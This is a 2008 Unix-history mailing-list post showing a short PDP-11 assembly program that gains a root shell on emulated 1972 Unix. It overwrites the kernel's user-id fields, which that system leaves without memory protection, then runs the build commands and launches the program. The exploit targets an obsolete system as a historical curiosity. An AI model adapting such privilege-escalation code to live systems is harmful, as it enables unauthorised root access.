[Unix-jun72] another small hack
Tim Newsham
newsham at lava.net
Sun May 11 04:37:33 AEST 2008
No memory protection:
.. = 40014
mov $0,037772 / u.uid = 0, u.ruid = 0
sys exec; shell; shellp
sys exit
shell: </bin/sh\0>
shellm: <-\0>
shellp: shellm
0
-----
$ APOUT_ROOT=../fs/root ../tools/apout/apout ../fs/root/bin/as hack.s
$ ../tools/fixaout.py
$ mv b.out hack
... put it on your rk0 as /bin/hack, login as bin, run "hack".
Tim Newsham
http://www.thenewsh.com/~newsham/
More information about the TUHS
mailing list